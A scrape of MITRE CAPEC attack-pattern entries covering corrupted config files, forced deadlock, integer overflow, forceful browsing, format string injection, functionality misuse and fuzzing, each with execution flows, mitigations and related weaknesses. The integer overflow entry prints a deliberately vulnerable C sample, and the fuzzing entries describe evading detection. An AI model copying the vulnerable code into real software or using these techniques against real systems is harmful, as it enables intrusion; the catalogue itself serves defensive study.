2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-263: Force Use of Corrupted Files

Attack Pattern ID: 263

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The targeted application must utilize a configuration file that an attacker is able to corrupt. In some cases, the attacker must be able to force the (re-)reading of the corrupted file if the file is normally only consulted at startup.

The severity of the attack hinges on how the application responds to the corrupted file. If the application detects the corruption and locks down, this may result in the denial of services provided by the application. If the application fails to detect the corruption, the result could be a more severe denial of service (crash or hang) or even an exploitable buffer overflow. If the application detects the corruption but fails in an unsafe way, this attack could result in the continuation of services but without certain security structures, such as filters or access controls. For example, if the corrupted file configures filters, an unsafe response from an application could result in simply disabling the filtering mechanisms due to the lack of usable configuration data.

Resources Required

This varies depending on the resources necessary to corrupt the configuration file and the resources needed to force the application to re-read it (if any).

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-25: Forced Deadlock

Attack Pattern ID: 25

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Timing and State

Execution Flow

Explore

The adversary initiates an exploratory phase to get familiar with the system.
The adversary triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish.
If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service.

Prerequisites

The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [REF-101]

The target host exposes an API to the user.

Skills Required

[Level: Medium]

This type of attack may be sophisticated and require knowledge about the system's resources and APIs.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption

Mitigations

Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms).

For competing actions, use well-known libraries which implement synchronization.

Example Instances

An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)

Related Weaknesses

CWE-ID	Weakness Name
412	Unrestricted Externally Accessible Lock
567	Unsynchronized Access to Shared Data in a Multithreaded Context
662	Improper Synchronization
667	Improper Locking
833	Deadlock
1322	Use of Blocking Code in Single-threaded, Non-blocking Context

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1499.004	Endpoint Denial of Service: Application or System Exploitation

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-101] "Wikipedia". Deadlock. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Deadlock>.

[REF-609] "OWASP Web Security Testing Guide". Testing for XML Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Phases, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Probing_Techniques, Related_Weaknesses, Solutions_and_Mitigations
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Solutions_and_Mitigations
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Prerequisites
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-92: Forced Integer Overflow

Attack Pattern ID: 92

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	128	Integer Attacks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

The first step is exploratory meaning the attacker looks for an integer variable that they can control.

Experiment

The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range.

Exploit

The integer variable is forced to have a value out of range which set its final value to an unexpected value.
The target host acts on the data and unexpected behavior may happen.

Prerequisites

The attacker can manipulate the value of an integer variable utilized by the target host.

The target host does not do proper range checking on the variable before utilizing it.

When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)

Skills Required

[Level: Low]

An attacker can simply overflow an integer by inserting an out of range value.

[Level: High]

Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Availability	Unreliable Execution

Mitigations

Use a language or compiler that performs automatic bounds checking.

Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Always do bound checking before consuming user input data.

Example Instances

Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544

The following code illustrates an integer overflow. The declaration of total integer as "unsigned short int" assumes that the length of the first and second arguments fits in such an integer [REF-547], [REF-548].

include <stdlib.h>
include <string.h>
include <stdio.h>

int main (int argc, char *const *argv)
{

if (argc !=3){

printf("Usage: prog_name <string1> <string2>\n");
exit(-1);

}
unsigned short int total;
total = strlen(argv[1])+strlen(argv[2])+1;
char * buff = (char *)malloc(total);
strcpy(buff, argv[1]);
strcpy(buff, argv[2]);

}

Related Weaknesses

CWE-ID	Weakness Name
190	Integer Overflow or Wraparound
128	Wrap-around Error
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
122	Heap-based Buffer Overflow
196	Unsigned to Signed Conversion Error
680	Integer Overflow to Buffer Overflow
697	Incorrect Comparison

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
03	Integer Overflows

References

[REF-131] J. Viega and G. McGraw. "Building Secure Software". Addison-Wesley. 2002.

[REF-547] Robert C. Seacord. "SAMATE - Software Assurance Metrics And Tool Evaluation". Test Case ID 1511. National Institute of Standards and Technology (NIST). 2006-05-22. <http://samate.nist.gov/SRD/view_testcase.php?tID=1511>.

[REF-548] Robert C. Seacord. "Secure Coding in C and C++". Page 152, Figure 5-1.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations, References, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-87: Forceful Browsing

Attack Pattern ID: 87

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.
Techniques
Use a spidering tool to follow and record all links.
Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.
Techniques
Use a spidering tool to follow and record attempts on well-known URLs.
Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.
Techniques
Access unprotected functions and execute them.
View unauthorized data: The attacker discovers and views unprotected sensitive data.
Techniques
Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)

Prerequisites

The forcibly browseable pages or accessible resources must be discoverable and improperly protected.

Skills Required

[Level: Low]

Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult.

Resources Required

None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism

Mitigations

Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.

Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.

Example Instances

A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.

An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.

Related Weaknesses

CWE-ID	Weakness Name
425	Direct Request ('Forced Browsing')
285	Improper Authorization
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent)

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
34	Predictable Resource Location

Relevant to the OWASP taxonomy mapping

Entry Name
Forced browsing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Taxonomy_Mappings

CAPEC-135: Format String Injection

Attack Pattern ID: 135

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	67	String Format Overflow in syslog()

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey application: The adversary takes an inventory of the entry points of the application.
Techniques
Spider web sites for all available links
List parameters, external variables, configuration files variables, etc. that are possibly used by the application.

Experiment

Determine user-controllable input susceptible to format string injection: Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.
Techniques
Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

Exploit

Try to exploit the Format String Injection vulnerability: After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.
Techniques
Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc.

Prerequisites

The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters.

Skills Required

[Level: High]

In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Access Control	Gain Privileges
Integrity	Execute Unauthorized Commands
Access Control	Bypass Protection Mechanism

Mitigations

Limit the usage of formatting string functions.

Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.

Example Instances

Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a "../po" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027

Related Weaknesses

CWE-ID	Weakness Name
134	Use of Externally-Controlled Format String
20	Improper Input Validation
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Format string attack

References

[REF-14] Hal Burch and Brendan Saulsbury. "FIO30-C. Exclude user input from format strings". CERT. 2011-05. <https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings>.

[REF-15] Robert Auger. "WASC Threat Classification 2.0". WASC-06 - Format String. The Web Application Security Consortium (WASC). <http://projects.webappsec.org/Format-String>.

[REF-616] "OWASP Web Security Testing Guide". Testing for Format String Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-554: Functionality Bypass

Attack Pattern ID: 554

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	179	Calling Micro-Services Directly
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	464	Evercookie
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	465	Transparent Proxy Abuse

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Related Weaknesses

CWE-ID	Weakness Name
424	Improper Protection of Alternate Path
1299	Missing Protection Mechanism for Alternate Hardware Interface

Content History

Submissions
Submission Date	Submitter	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-212: Functionality Misuse

Attack Pattern ID: 212

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	2	Inducing Account Lockout
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	48	Passing Local Filenames to Functions That Expect a URL
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	50	Password Recovery Exploitation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	111	JSON Hijacking (aka JavaScript Hijacking)
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	620	Drop Encryption Level
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	682	Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes.

Skills Required

[Level: Low]

General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured.

Consequences

Scope	Impact	Likelihood
Confidentiality	Gain Privileges
Confidentiality Integrity Availability	Other

Mitigations

Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.

When implementing security features, consider how they can be misused and compromised.

Related Weaknesses

CWE-ID	Weakness Name
1242	Inclusion of Undocumented Features or Chicken Bits
1246	Improper Write Handling in Limited-write Non-Volatile Memories
1281	Sequence of Processor Instructions Leads to Unexpected Behavior

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Solutions_and_Mitigations
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-28: Fuzzing

Attack Pattern ID: 28

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	215	Fuzzing for application mapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Observe communication and inputs: The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems.

Techniques
Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system.
Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters.
Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

Generate fuzzed inputs: Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.

Techniques
Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.

Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input.

Exploit

Craft exploit payloads: Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system.

Techniques
Identify and embed shell code for the target system.
Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.)
Induce denial of service by exploiting resource leaks or bad error handling.

Skills Required

[Level: Low]

There is a wide variety of fuzzing tools available.

Resources Required

Fuzzing tools.

Indicators

A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Availability	Unreliable Execution
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Alter Execution Logic

Mitigations

Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made.

Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior.

Example Instances

A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system.

Related Weaknesses

CWE-ID	Weakness Name
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-215: Fuzzing for application mapping

Attack Pattern ID: 215

Abstraction: Detailed

View customized information:

Description

Extended Description

By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	28	Fuzzing
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	54	Query System for Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques, Collect and Analyze Information

Execution Flow

Explore

Observe communication and inputs: The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.

Techniques
Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.
Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.
Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

Techniques
Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.

Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application

Exploit

Craft exploit payloads: An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.

Techniques
Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.
